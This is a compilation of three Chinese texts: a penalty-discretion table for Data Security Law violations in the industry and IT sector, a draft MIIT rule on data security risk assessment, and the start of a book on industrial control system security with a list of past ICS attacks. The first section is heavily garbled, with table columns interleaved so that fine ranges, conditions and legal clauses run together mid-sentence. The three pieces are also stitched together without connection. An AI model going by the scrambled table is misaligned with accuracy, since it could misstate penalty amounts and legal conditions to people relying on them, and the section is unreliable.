业务、停业整顿、吊 社会公共利益造成损害的时 开展数据处理活动的情况,面 销相关业务许可证或 间较短,影响范围较小,仅 临的数据安全风险及其应对措 者吊销营业执照,对 涉及单个或少数企业的,予 — 37 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 施等。 直接负责的主管人员 以从轻处罚。 第四十五条 开展数据处 和其他直接责任人员 理活动的组织、个人不履行本 处五万元以上十四万 法第二十七条、第二十九条、 元以下罚款。 第三十条规定的数据安全保护 义务的,且拒不改正或者造成 处一百万元以上二百 大量数据泄露等严重后果的, 万元以下罚款,并责 拒不改正或者造成大量数据 处五十万元以上二百万元以下 令暂停相关业务、停 泄露等严重后果的,且对公 罚款,并可以责令暂停相关业 业整顿、吊销相关业 民、法人和组织合法权益、 务、停业整顿、吊销相关业务 务许可证或者吊销营 从重处罚 社会公共利益造成损害的时 许可证或者吊销营业执照,对 业执照,对直接负责 间长,影响范围大,涉及多 直接负责的主管人员和其他直 的主管人员和其他直 个企业或跨行业、跨地区的, 接责任人员处五万元以上二十 接责任人员处十万元 予以从重处罚。 万元以下罚款。 以上二十万元以下罚 款。 第四十五条 违反国家核 不予处罚 无 无 心数据管理制度,危害国家主 减轻处罚 无 无 权、安全和发展利益的,由有 关主管部门处二百万元以上一 从轻处罚 无 无 千万元以下罚款,并根据情况 处四百万元以上一千 涉及 2 个以上数据处理者的 责令暂停相关业务、停业整顿、 万元以下罚款,并根 核心数据的,对公民、法人 从重处罚 吊销相关业务许可证或者吊销 据情况责令暂停相关 和组织合法权益、社会公共 营业执照;构成犯罪的,依法 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 — 38 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 追究刑事责任。 销相关业务许可证或 长,影响范围涉及多个行业、 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 违法行为轻微并及时改正, 《中华人民共和国数据安 没有造成危害后果的,或者 全法》第三十一条 关键信息基 对工业和信 违法行为当事人有证据足以 础设施的运营者在中华人民共 息化领域关 不予处罚 责令改正 证明没有主观过错的,不予 和国境内运营中收集和产生重 键信息基础 行政处罚。初次违法且危害 要数据的出境安全管理,适用 设施的运营 (一)工业和信息 后果轻微并及时改正的,可 《中华 人民共和 国网络安 全 者在中华人 化领域中的关键信息 以不予行政处罚。 法》的规定;其他数据处理者 民共和国境 基础设施运营者在中 造成较轻后果,对公民、法 在中华人民共和国境内运营中 内运营中收 华人民共和国境内运 责令改正,给予警告,人和组织合法权益、社会公 收集和产生的重要数据的出境 集和产生的 营中收集和产生的重 可以并处十万元以下 共利益造成损害的时间较 11 安全管理办法,由国家网信部 重要数据的 要数据未在境内存储, 罚款,对直接负责的 短,影响范围较小,仅涉及 门会同国务院有关部门制定。 减轻处罚 出境安全管 或者因业务需要,确需 主管人员和其他直接 单个或少数企业,且主动消 第四十六条 违反本法第 理,未落实 向境外提供的,未按照 责任人员处一万元以 除或者减轻危害后果,在规 三十一条规定,向境外提供重 《中华人民 有关规定进行数据出 下罚款 定期限内提前改正到位的, 要数据的,由有关主管部门责 共和国网络 境安全评估 予以减轻处罚。 令改正,给予警告,可以并处 安全法》的有 责令改正,给予警告,造成较轻后果,对公民、法 十万元 以上一百 万元以下 罚 关规定的行 可以并处十万元以上 人和组织合法权益、社会公 款,对直接负责的主管人员和 政处罚 从轻处罚 七十万元以下罚款, 共利益造成损害的时间较 其他直接责任人员可以处一万 对直接负责的主管人 短,影响范围较小,仅涉及 元以上十万元以下罚款。 员和其他直接责任人 单个或少数企业,在规定期 — 39 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 员处一万元以上七万 限内采取积极有效措施,但 元以下罚款 未完全改正到位、承诺继续 加强改正的,予以从轻处罚。 处二十万元以上一百 造成严重后果,对公民、法 万元以下罚款,对直 人和组织合法权益、社会公 接负责的主管人员和 共利益造成损害的时间长, 从重处罚 其他直接责任人员处 影响范围大,涉及多个企业 两万元以上十万元以 或跨行业、跨地区的,予以 下罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第三十一条 关键信息基 减轻处罚 无 无 础设施的运营者在中华人民共 从轻处罚 无 无 和国境内运营中收集和产生重 要数据的出境安全管理,适用 处二百万元以上一千 《中华 人民共和 国网络安 全 万元以下罚款,并责 法》的规定;其他数据处理者 令暂停相关业务、停 情节严重的,且对公民、法 在中华人民共和国境内运营中 业整顿、吊销相关业 人和组织合法权益、社会公 收集和产生的重要数据的出境 务许可证或者吊销营 共利益造成损害的时间长, 从重处罚 安全管理办法,由国家网信部 业执照,对直接负责 影响范围大,涉及多个企业 门会同国务院有关部门制定。 的主管人员和其他直 或跨行业、跨地区的,予以 第四十六条 违反本法第 接责任人员处二十万 从重处罚。 三十一条规定,向境外提供重 元以上一百万元以下 要数据的,且情节严重的,处 罚款。 一百万元以上一千万元以下罚 — 40 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 款,并可以责令暂停相关业务、 停业整顿、吊销相关业务许可 证或者吊销营业执照,对直接 负责的主管人员和其他直接责 任人员处十万元以上一百万元 以下罚款。 对工业和信 《中华人民共和国数据安 违法行为轻微并及时改正, 息化领域非 全法》第三十一条 关键信息基 没有造成危害后果的,或者 关键信息基 础设施的运营者在中华人民共 违法行为当事人有证据足以 础设施运营 和国境内运营中收集和产生重 不予处罚 责令改正 证明没有主观过错的,不予 (二)其他工业和 行政处罚。初次违法且危害 者的数据处 要数据的出境安全管理,适用 信息化领域数据处理 后果轻微并及时改正的,可 理者在中华 《中华 人民共和 国网络安 全 者,在中华人民共和国 以不予行政处罚。 人民共和国 法》的规定;其他数据处理者 境内收集和产生的重 境内运营中 在中华人民共和国境内运营中 造成较轻后果,对公民、法 要数据,未按照法律、 12 收集和产生 收集和产生的重要数据的出境 责令改正,给予警告,人和组织合法权益、社会公 行政法规等要求在境 的重要数据 安全管理办法,由国家网信部 可以并处十万元以下 共利益造成损害的时间较 内存储,或者确需向境 的出境安全 门会同国务院有关部门制定。 罚款,对直接负责的 短,影响范围较小,仅涉及 外提供的,未依法依规 减轻处罚 管理,未落实 第四十六条 违反本法第 主管人员和其他直接 单个或少数企业,且主动消 进行数据出境安全评 《数据出境 三十一条规定,向境外提供重 责任人员处一万元以 除或者减轻危害后果,在规 估 安全评估办 要数据的,由有关主管部门责 下罚款 定期限内提前改正到位的, 法》等有关规 令改正,给予警告,可以并处 予以减轻处罚。 定的行政处 十万元 以上一百 万元以下 罚 责令改正,给予警告,造成较轻后果,对公民、法 罚 款,对直接负责的主管人员和 从轻处罚 可以并处十万元以上 人和组织合法权益、社会公 — 41 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 其他直接责任人员可以处一万 七十万元以下罚款, 共利益造成损害的时间较 元以上十万元以下罚款。 对直接负责的主管人 短,影响范围较小,仅涉及 员和其他直接责任人 单个或少数企业,在规定期 员处一万元以上七万 限内采取积极有效措施,但 元以下罚款 未完全改正到位、承诺继续 加强改正的,予以从轻处罚。 处二十万元以上一百 造成严重后果,对公民、法 万元以下罚款,对直 人和组织合法权益、社会公 接负责的主管人员和 共利益造成损害的时间长, 从重处罚 其他直接责任人员处 影响范围大,涉及多个企业 两万元以上十万元以 或跨行业、跨地区的,予以 下罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第三十一条 关键信息基 减轻处罚 无 无 础设施的运营者在中华人民共 和国境内运营中收集和产生重 从轻处罚 无 无 要数据的出境安全管理,适用 处二百万元以上一千 《中华 人民共和 国网络安 全 万元以下罚款,并责 情节严重的,且对公民、法 法》的规定;其他数据处理者 令暂停相关业务、停 人和组织合法权益、社会公 在中华人民共和国境内运营中 业整顿、吊销相关业 共利益造成损害的时间长, 从重处罚 收集和产生的重要数据的出境 务许可证或者吊销营 影响范围大,涉及多个企业 安全管理办法,由国家网信部 业执照,对直接负责 或跨行业、跨地区的,予以 门会同国务院有关部门制定。 的主管人员和其他直 从重处罚。 第四十六条 违反本法第 接责任人员处二十万 — 42 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 三十一条规定,向境外提供重 元以上一百万元以下 要数据的,且情节严重的,处 罚款 一百万元以上一千万元以下罚 款,并可以责令暂停相关业务、 停业整顿、吊销相关业务许可 证或者吊销营业执照,对直接 负责的主管人员和其他直接责 任人员处十万元以上一百万元 以下罚款。 《中华人民共和国数据安 没有造成危害后果的,不予 对从事工业 全法》第三十三条 从事数据交 行政处罚。初次违法且危害 和信息化领 不予处罚 责令改正 易中介服务的机构提供服务, 后果轻微并及时改正的,可 域数据交易 应当要求数据提供方说明数据 以不予行政处罚。 中介服务的 来源,审核交易双方的身份, 责令改正,没收违法 机构,未要求 并留存审核、交易记录。 所得,处违法所得一 数据提供方 13 / 第四十七条 从事数据交 倍以下罚款,没有违 说明数据来 易中介服务的机构未履行本法 法所得或者违法所得 造成较轻危害后果,且主动 源,审核交易 第三十三条规定的义务的,由 减轻处罚 不足十万元的,处十 消除或者减轻危害后果的, 双方的身份, 有关主管部门责令改正,没收 万元以下罚款,对直 予以减轻处罚。 并留存审核、 违法所得,处违法所得一倍以 接负责的主管人员和 交易记录的 上十倍以下罚款,没有违法所 其他直接责任人员处 行政处罚 得或者 违法所得 不足十万 元 一万元以下罚款 — 43 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 的,处十万元以上一百万元以 责令改正,没收违法 下罚款,并可以责令暂停相关 所得,处违法所得一 业务、停业整顿、吊销相关业 倍以上七倍以下罚 务许可证或者吊销营业执照; 款,没有违法所得或 规定期限内未及时改正,仍 对直接负责的主管人员和其他 者违法所得不足十万 存在数据安全违法情形的, 直接责任人员处一万元以上十 从轻处罚 元的,处十万元以上 或造成较轻后果的,予以从 万元以下罚款。 七十万元以下罚款, 轻处罚。 对直接负责的主管人 员和其他直接责任人 员处一万元以上七万 元以下罚款 责令改正,没收违法 所得,处违法所得二 倍以上十倍以下罚 款,没有违法所得或 者违法所得不足十万 元的,处二十万元以 拒不改正,或造成严重后果 从重处罚 上一百万元以下罚 的,予以从重处罚。 款,并可以责令暂停 相关业务、停业整顿、 吊销相关业务许可证 或者吊销营业执照, 对直接负责的主管人 员和其他直接责任人 — 44 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 员处二万元以上十万 元以下罚款 《中华人民共和国数据安 违法行为轻微并及时改正, 对境内的工 全法》第三十六条 中华人民共 没有造成危害后果的,或者 业和信息化 和国主管机关根据有关法律和 违法行为当事人有证据足以 领域数据处 中华人民共和国缔结或者参加 不予处罚 责令改正 证明没有主观过错的,不予 理者未经工 (三)非经工业和 的国际条约、约定,或者按照 行政处罚。初次违法且危害 业、电信、无 信息化部批准,向外国 平等互惠原则,处理外国司法 后果轻微并及时改正的,可 线电领域主 工业、电信、无线电执 或者执法机构关于提供数据的 以不予行政处罚。 14 管机关批准 法机构提供存储于中 请求。非经中华人民共和国主 造成较轻后果,对公民、法 向外国司法 华人民共和国境内的 管机关批准,境内的组织、个 责令改正,给予警告,人和组织合法权益、社会公 或者执法机 工业和信息化领域数 人不得向外国司法或者执法机 可以并处十万元以下 共 利 益 造 成 损 害 的 时 间 较 构提供存储 据 构提供存储于中华人民共和国 罚款,对直接负责的 短,影响范围较小,仅涉及 减轻处罚 于境内的数 境内的数据。 主管人员和其他直接 单个或少数企业,且主动消 据的行政处 第四十八条 违反本法第 责任人员处一万元以 除或者减轻危害后果,在规 罚 三十六条规定,未经主管机关 下罚款 定期限内提前改正到位的, 批准向外国司法或者执法机构 予以减轻处罚。 — 45 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 提供数据的,由有关主管部门 造成较轻后果,对公民、法 给予警告,可以并处十万元以 责令改正,给予警告, 人和组织合法权益、社会公 上一百万元以下罚款,对直接 可以并处十万元以上 共利益造成损害的时间较 负责的主管人员和其他直接责 七十万元以下罚款, 短,影响范围较小,仅涉及 任人员可以处一万元以上十万 从轻处罚 对直接负责的主管人 单个或少数企业,在规定期 元以下罚款 员和其他直接责任人 限内采取积极有效措施,但 员处一万元以上七万 未完全改正到位、承诺继续 元以下罚款 加强改正的,予以从轻处罚。 处二十万元以上一百 造成严重后果,对公民、法 万元以下罚款,对直 人和组织合法权益、社会公 接负责的主管人员和 共利益造成损害的时间长, 从重处罚 其他直接责任人员处 影响范围大,涉及多个企业 两万元以上十万元以 或跨行业、跨地区的,予以 下罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第三十六条 中华人民共 减轻处罚 无 无 和国主管机关根据有关法律和 处一百万元以上三百 造成严重后果,但对公民、 中华人民共和国缔结或者参加 五十万元以下罚款, 法人和组织合法权益、社会 的国际条约、约定,或者按照 并可以责令暂停相关 公共利益造成损害的时间较 平等互惠原则,处理外国司法 从轻处罚 业务、停业整顿、吊 短,影响范围较小,仅涉及 或者执法机构关于提供数据的 销相关业务许可证或 单个或少数企业,在规定期 请求。非经中华人民共和国主 者吊销营业执照,对 限内采取积极有效措施,但 管机关批准,境内的组织、个 直接负责的主管人员 未完全改正到位、承诺继续 — 46 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 人不得向外国司法或者执法机 和其他直接责任人员 加强改正的,予以从轻处罚。 构提供存储于中华人民共和国 处五万元以上三十五 境内的数据。 万元以下罚款。 第四十八条 违反本法第 处二百万元以上五百 三十六条规定,未经主管机关 万元以下罚款,并可 批准向外国司法或者执法机构 以 责 令 暂 停 相 关 业 造成严重后果,对公民、法 提供数据的,且造成严重后果 务、停业整顿、吊销 人和组织合法权益、社会公 的,处一百万元以上五百万元 相关业务许可证或者 共利益造成损害的时间长, 以下罚款,并可以责令暂停相 从重处罚 吊销营业执照,对直 影响范围大,涉及多个企业 关业务、停业整顿、吊销相关 接负责的主管人员和 或跨行业、跨地区的,予以 业务许 可证或者 吊销营业 执 其他直接责任人员处 从重处罚。 照,对直接负责的主管人员和 十万元以上五十万元 其他直接责任人员处五万元以 以下罚款。 上五十万元以下罚款。 — 47 —
standards
附件1 工业和信息化领域数据安全风险评估 实施细则(试行) (征求意见稿) 第一条【目的依据】根据《中华人民共和国数据安全法》《中华人民共和国网络安全法》《工业和信息化领域数据安全管理办法(试行)》等法律法规、政策文件有关要求,引导工业和信息化领域数据处理者规范开展数据安全风险评估工作,提升数据安全管理水平,维护国家安全和发展利益,制定本细则。 第二条【适用范围】本细则适用于中华人民共和国境内工业和信息化领域重要数据和核心数据处理者开展的数据安全风险评估活动。 一般数据处理者可参照本细则开展数据安全风险评估。 第三条【管理机构】工业和信息化部统一管理、监督和指导工业和信息化领域数据安全风险评估工作,组织开展相关评估标准制修订及推广应用。 各省、自治区、直辖市及计划单列市、新疆生产建设兵团工业和信息化主管部门,各省、自治区、直辖市通信管理局和无线电管理机构(以下统称地方行业监管部门)依据职责分别负责监督管理本地区工业、电信、无线电重要数据和核心数据处理者开展数据安全风险评估工作。 工业和信息化部及地方行业监管部门统称为行业监管部门。 第四条【工作原则】重要数据和核心数据处理者按照及时、客观、有效的原则开展数据安全风险评估,形成真实、完整、准确的评估报告,并对评估结果负责。 第五条【评估内容】重要数据和核心数据处理者按照国家法律法规、行业监管部门有关规定以及评估标准,对数据处理活动的目的和方式、业务场景、安全保障措施、风险影响等要素,开展数据安全风险评估,重点评估以下内容: (一)数据处理目的、方式、范围是否合法、正当、必要; (二)数据安全管理制度、流程策略的制定和落实情况; (三)数据安全组织架构、岗位配备和职责履行情况; (四)数据安全技术防护能力建设及应用情况; (五)数据处理活动相关人员的数据安全意识、知识技能、从业背景情况; (六)发生数据遭到篡改、破坏、泄露、丢失或者被非法获取、非法利用等安全事件,对国家安全、公共利益的影响范围、程度等风险; (七)涉及数据提供、委托处理、转移的,数据提供方、接收方的安全保障能力、诚信守法和责任义务约束情况; (八)涉及国家法律法规中规定需要申报的数据出境安全评估情形,履行数据出境安全评估要求落实情况;已通过国家有关部门组织的数据出境安全评估且在有效期内的,实际数据出境的规模、范围、种类、敏感程度等要素与申报事项的符合情况。 第六条【评估期限】重要数据和核心数据处理者每年完成至少一次数据安全风险评估,并形成评估报告。数据安全风险评估结果有效期为一年,自评估报告首次出具之日起计算。 在有效期内出现以下情形之一的,重要数据和核心数据处理者对发生变化及其影响的部分,重新开展数据安全风险评估,并更新评估报告: (一)拟新增跨主体提供、委托处理、转移重要数据或者核心数据的; (二)重要数据、核心数据安全状态发生变化对数据安全造成不利影响的,包括但不限于数据处理目的、方式、适用范围和安全制度策略等发生重大调整的; (三)发生涉及重要数据、核心数据的安全事件的; (四)行业监管部门要求进行评估的其他情形。 第七条【评估方式】重要数据和核心数据处理者可以自行或者委托具有工业和信息化数据安全工作经验的第三方评估机构开展评估。评估过程应当建立至少包括组织管理、业务运营、技术保障、安全合规等人员的专业化评估团队,制定完备的评估工作方案,配备有效的技术评测工具。 第八条【委托评估】重要数据和核心数据处理者委托第三方评估机构开展数据安全风险评估的,可以通过订立合同或者其他具有法律效力的文件,明确双方的权利和责任,向第三方评估机构提供必需的材料和条件,确保相关材料的真实性和完整性,并确认评估结果。 第九条【风险控制】重要数据和核心数据处理者对评估中发现的数据安全风险隐患,及时采取适当措施消除或降低风险隐患。 第十条【评估报送】重要数据和核心数据处理者在评估工作完成后的10个工作日内,向本地区行业监管部门报送或更新评估报告。 中央企业督促指导所属企业履行属地数据安全风险评估及评估报告报送要求,并将梳理汇总的企业集团本部、所属公司的评估报告报送工业和信息化部。 根据工作需要,地方行业监管部门将本地区本领域重要数据和核心数据处理者的评估报告报送工业和信息化部备案。 第十一条【报告审核】行业监管部门根据管理需要,可以自行或委托专业机构对评估报告进行审核,发现不符合国家及行业有关规定和标准的,通知重要数据和核心数据处理者改正。 涉及跨境提供、转移、委托处理重要数据和核心数据的,或者跨主体提供、转移、委托处理核心数据的,地方行业监管部门对评估报告审查后,报工业和信息化部。工业和信息化部按照国家有关规定进行复核。 第十二条【评估机构认定】鼓励具有工业和信息化领域数据安全工作经验的认证机构开展第三方评估机构的能力认证。 相关认证机构配备相应的人员和技术保障能力,建立第三方评估机构能力评定制度,明确第三方评估机构在管理体系、人员能力、工具设施、评估领域等方面的规范要求,跟踪管理第三方评估机构的服务质量,督促第三方评估机构独立、公正、客观、科学的开展数据安全风险评估工作。 第十三条【评估机构义务】第三方评估机构应当履行下列义务: (一)对评估工作中知悉的国家秘密、重要数据和核心数据的目录与内容、商业秘密、个人隐私等严格保密; (二)严格按照国家法律法规、行业监管部门有关规定以及评估标准,公正、独立地开展评估并出具评估报告,全面、准确地反映重要数据和核心数据处理者的数据安全风险状况,提供务实有效的风险整改建议措施; (三)除重要数据和核心数据处理者明确同意或者法律、行政法规另有规定外,不得向其他组织或个人提供其收集掌握的技术保护措施、关键岗位人员和安全风险等相关信息。 第十四条【监督检查】工业和信息化部根据技术能力、人员配备、信誉资质等情况,择优遴选通过能力评定的第三方评估机构,建立工业和信息化领域数据安全风险评估支撑机构库。地方行业监管部门可以参照建立本地区数据安全风险评估支撑机构库。 行业监管部门根据工作需要,可以自行或委托数据安全风险评估支撑机构库中的机构,对重要数据和核心数据处理者的数据处理活动开展专项风险评估,或对重要数据和核心数据处理者的风险评估工作落实情况进行监督检查。 重要数据和核心数据处理者对行业监管部门开展的专项风险评估及监督检查予以配合,并对评估发现的相关问题及时进行改正。 第十五条【机构监管】行业监管部门对于违反国家认证认可相关规定的认证机构,将相关线索移交市场监督管理部门处理。 行业监管部门对第三方评估机构的评估活动进行监督管理,对违反法律法规、未按行业规定和标准开展评估活动、未履行保密义务的第三方评估机构,视情按照规定权限和程序进行约谈、通报或指导相关认证机构撤销认证。 第十六条【保密要求】行业监管部门及委托支撑机构的工作人员对在履行职责中知悉的国家秘密、商业秘密、个人信息、评估工作信息等,负有保密义务。 第十七条【其他规定参照】涉及军事、国家秘密信息等数据处理活动,按照国家有关规定执行。
standards
工业控制系统信息安全 随着现代社会发展的迅速工业化和信息化,工业控制系统越来越多地采用信息技术和通信技术,工业控制 系统信息安全面临严峻的挑战。本书简洁、全面地介绍了工业控制系统信息安全的概念和标准体系,系统地介 绍了工业控制系统架构与漏洞分析,并且系统地阐述了工业控制系统信息安全的技术与方案部署、风险评估、 生命周期、管理体系、项目工程、产品认证,工业控制系统的入侵检测与防护、补丁管理,工业控制系统信息 安全软件与监控。本书以工业控制系统信息安全应用为导向,内容阐述深入浅出,问题分析清晰透彻,除系统 地介绍相关技术与理论外,还有具体的工业控制系统信息安全应用举例,并且对未来进行了展望,可进一步加 深读者对内容的理解和掌握。 第1版前言 工业控制系统信息安全事件的频繁发生,吸引了全球人的目光,因为现代工业控制系统普 遍采用数据采集与监控 (SCADA) 系统、分布式控制系统 (DCS) 、 可编程逻辑控制器 (PLC) 系统,以及其他控制系统等,并且已广泛应用于电力、水利、石化、钢铁、医药、食品、汽车、 航天等工业领域,成为国家关键基础设施的重要组成部分,其是否能够安全、稳定运行,已经 关系到国家的战略安全。 世界各国政府、专家都在积极开展广泛合作,已经制定出一些相关的国际标准和规范,也 在组织本国的人力、物力,制定相应的国家标准和规范,做到未雨绸缪,竭尽全力地做好工业 控制系统信息安全工作。 工业控制系统信息安全工作刚刚走过十几年,还处在发展过程中。建立一套全面的知识和 应用体系是我们的当务之急,这正是编写本书的出发点。虽然对其中的内容有些争议,但是我 们希望在各方的共同参与下,积极推进工业控制系统信息安全工作,做到在争论中不断发展, 在实践中不断推进。因此,本书将给广大工业控制系统用户一个全面和正确的指导,给广大 从事工业控制系统设计、施工、调试和服务的用户以强有力的支撑,同时也可以给工业控制 系统供应商提供参考,对政府相关职能部门的工作也有一定的参考价值。 本书分为12章。第1章介绍工业控制系统信息安全现状、威胁与发展趋势、定义与要求, 以及标准体系;第2章介绍工业控制系统架构与漏洞分析;第3章介绍工业控制系统信息安全 技术与部署中的工业防火墙技术、虚拟专用网技术、控制网络逻辑分隔、网络隔离,以及纵深 防御架构;第4章介绍工业控制系统信息安全风险评估的系统识别、区域与管道的定义、信息 安全等级、风险评估过程,以及风险评估方法;第5章介绍工业控制系统生命周期、信息安全 程序成熟周期,以及信息安全等级生命周期;第6章介绍工业控制系统信息安全管理体系的安 全方针、组织与合作团队、资产管理、人力资源安全、物理与环境管理、通信与操作管理、访 问控制、信息获取与开发维护、信息安全事件管理、业务连续性管理,以及符合性;第7章介 绍工业控制系统信息安全项目工程的规划设计、初步设计、详细设计、施工调试、运行维护, 以及升级优化;第8章介绍工业控制系统信息安全产品认证机构、产品认证,以及产品认证趋 势;第9章介绍工业控制系统入侵检测与防护;第10章介绍工业控制系统补丁定义、补丁管理 系统设计、补丁管理程序,以及补丁管理实施;第11章介绍工业控制系统信息安全软件与监控 的两个常见应用实例,即工厂信息管理系统和远程访问系统;第12章介绍工业发展趋势、工业 控制系统发展趋势,以及工业控制系统信息安全展望。 本书在编写过程中,除引用了作者多年的工作实践和研究内容之外,还参考了一些国内外 优秀论文、书籍,以及互联网上公布的相关资料,虽已尽量在书后的参考文献中列出,但由于 互联网上资料数量众多、出处引用不明确,可能无法将所有文献一—注明出处,对这些资料的 作者表示由衷的感谢,同时声明,原文版权属于原作者。 本书是一本工业控制系统信息安全前沿技术专业书,可作为广大从事工业控制系统和网络 安全管理工程设计、应用开发、部署与管理工作的高级技术人员的参考书,也可作为高等院校 工业自动化、计算机科学与技术、信息安全等相关专业的本科高年级学生、研究生的参考书。 工业控制系统信息安全是一门应用性很强的跨专业学科,在工业技术和信息技术大规模发 展的今天迅速发展,本书尝试对此领域的理论和技术做了一些归纳,与广大同行和关心工业控 制系统信息安全的人士分享。由于工业控制系统信息安全技术在快速发展,加之作者的水平有 限,书中难免有缺点和错误,真诚希望读者不吝赐教,以期修订时更正。 第2版前言 本书第1版自2015年出版以来,其系统性、实用性和前瞻性得到了电力、水利、石化、钢 铁、医药、食品、交通、航天等工业领域从事工业控制系统信息安全技术管理和从事工业控制 系统信息安全服务、建设、研发等的专业人员的广泛关注。同时,作为国内工业控制系统信息 安全领域第一本系统、实用、先进的专业图书,本书被多家培训机构选为工业控制系统信息安 全专业培训的首选教材,受到相关读者的一致好评。 随着国家网络安全战略规划建设的大力推进和社会各界从事工业控制系统信息安全工作人 士的共同参与,工业控制系统信息安全在法律法规、标准规范、信息安全技术、行业应用等方 面正在快速发展,结合工业控制系统信息安全专业培训经验与建议,本书的再版势在必行。 在本书编写过程中,主要对第1版第1章中的工业控制系统信息安全标准体系和第3章工 业控制系统信息安全技术与部署进行了补充和修改,并将第11章改编为工业控制系统信息安全 软件与监控。近年来,国际上通用的工业控制系统信息安全标准陆续发布,国内的工业控制系 统信息安全法律法规、标准规范也在不断制定和发布。因此,本书第1章中的工业控制系统信 息安全标准体系必须紧跟行业步伐。此外,近些年出现的工业控制系统信息安全技术对目前工 作有很好的指导作用,因此,第1版第3章工业控制系统信息安全技术与部署需要进行补充和 修改。再有,近些年涌现出的工业控制系统信息安全软件与监控是工业控制系统信息安全的重 要组成部分,因此,将本书第11 章改编为工业控制系统信息安全软件与监控。另外,对一些章 节中的有关部分也进行了修改,使之更贴近工业控制系统信息安全应用和研究指导。 工业领域是国家关键基础设施的重要组成部分,工业控制系统信息安全关系着国家的战略 安全。因此,从事工业控制系统信息安全相关工作的人员应担负其重任,不断补充工业控制系 统信息安全知识,努力做好工业控制系统信息安全工作。 本书可作为广大从事工业控制系统和网络安全管理工程设计、应用开发、部署与管理工作 的高级技术人员的参考书,也可作为高等院校工业自动化、计算机科学与技术、信息安全等相 关专业的本科高年级学生、研究生的参考书。 工业控制系统信息安全是一门快速发展的跨专业学科。在工业技术和信息技术大规模发展 的今天,通过广大专业同行和关心工业控制系统信息安全人士的不懈努力,工业控制系统信息 安全技术已取得了一定的成效。由于工业控制系统信息安全技术还在飞速发展,加之作者的水 平有限,书中难免存在错漏和不足之处,请广大读者批评指正,以便不断完善。 第1章 工业控制系统信息安全简介 1.1 工业控制系统信息安全现状、 威胁与发展趋势 随着现代社会发展的迅速工业化和信息化,工业控制系统产品越来越多地采用以信息 技术为基础的通用协议、通用硬件和通用软件,并广泛应用于电力、冶金、安防、水利、 污水处理、石油天然气、化工、交通运输、制药,以及大型制造等行业中。同时,为了满 足当前工业控制的需求,提高工厂或公司管理的运作效率,工业控制系统通过各种方式与 互联网等公共网络连接,使病毒、木马等威胁向工业控制系统扩散有了可乘之机。由于工 业控制系统的产品特性及网络连接,工业控制系统正面临巨大的威胁,因此工业控制系统 信息安全受到越来越多的关注。 1.1.1 工业控制系统信息安全现状 2001年后,通用开发标准与互联网技术的广泛使用使针对工业控制系统的攻击行为出 现大幅增长,工业控制系统信息安全形势变得日益严峻。 据权威工业安全事件信息库 (Repository of Industrial Security Incidents,RISI) 统计, 截止2011年10月,全球已发生200余起针对工业控制系统的攻击事件。据美国ICS-CERT 报告,2012年工业控制安全事件197起,2013年工业控制(简称工控)安全事件248 起, 其统计图如图1-1所示。 由此可见,近几年工业控制系统信息安全事件呈明显增多趋势。同时,ICS-CERT 安全 报告指出,工业控制系统信息安全事件主要集中在能源、关键制造业、交通、通信、水利、 核能等领域,而能源行业的安全事故超过一半。 近年来,典型工业控制系统入侵事件出现在能源、水利与水处理、交通运输、制造等 行业。 1. 能源行业 1994年,美国亚利桑那州 Salt River Project 被黑客入侵。 2000年,俄罗斯政府声称黑客成功控制了世界上最大的天然气输送管道网络(属于 GAzprom 公司)。 2001年,黑客侵入了监管加州多数电力传输系统的独立运营商。 2003年,美国俄亥俄州 Davis-Besse 的核电厂控制网络内的一台计算机被微软的 SQL Server 蠕虫病毒感染,导致其安全监控系统停机将近5小时。 2003年,龙泉、政平、鹅城换流站控制系统发现病毒,后发现是由外国工程师在系统 调试中用笔记本电脑上网所致。 2007年,在美国国土安全局的 “Aurora” 演习中,针对电力控制系统进行渗透测试, 一台发电机在其控制系统受到攻击后被物理损坏。 2010年,“网络超级武器”Stuxnet 病毒有针对性地入侵工业控制系统,严重威胁到伊 朗布什尔核电站核反应堆的安全运营。 2012年,美国国土安全局下属的 ICS-CERT 称,自2011年12月以来,已发现多起试 图入侵几大输气公司的黑客活动。 2012年4月22日,伊朗石油部和国家石油公司的内部计算机网络遭病毒攻击,为安 全起见,伊朗方面暂时切断了海湾附近哈尔克岛石油设施的网络连接。 2. 水利与水处理行业 2000年, 一个工程师在应聘澳大利亚的一家污水处理厂被多次拒绝后,远程入侵该厂 的污水处理控制系统,恶意造成污水处理泵站故障,导致超过1000m³ 的污水被直接排入河 流,造成了严重的环境灾难。 2001 年,澳大利亚的一家污水处理厂由于内部工程师的多次网络入侵而发生了46次 控制设备功能异常事件。 2005年,美国水电站溢坝事件。 2006年,黑客从 Internet 攻破了美国哈里斯堡一家污水处理厂的安全措施,在其系统 内植入了能够影响污水操作的恶意程序。 2007年,攻击者入侵加拿大的一个水利 SCADA 控制系统,通过安装恶意软件破坏了 用于控制从 Sacramento 河调水的控制计算机。 2011年,黑客通过Internet 操纵美国伊利诺伊州城市供水系统 SCADA, 使得其控制的 供水泵损坏。 3. 交通运输行业 1997年, 一个十几岁的少年入侵纽约 NYNES 系统,干扰了航空与地面通信,导致马 萨诸塞州的Worcester 机场关闭6小时。 2003年,CSX 运输公司的计算机系统被病毒感染,导致华盛顿特区的客货运输中断。 2003年,19岁的 Aaron Caffrey 入侵 Houston 渡口的计算机系统,导致该系统停机。 2008年,攻击者入侵波兰某城市地铁系统,通过电视遥控器改变轨道扳道器,导致四 节车厢脱轨。 4. 制造行业 2005年,在 Zotob 蠕虫安全事件中,尽管在 Internet 与企业网、控制网之间部署了防 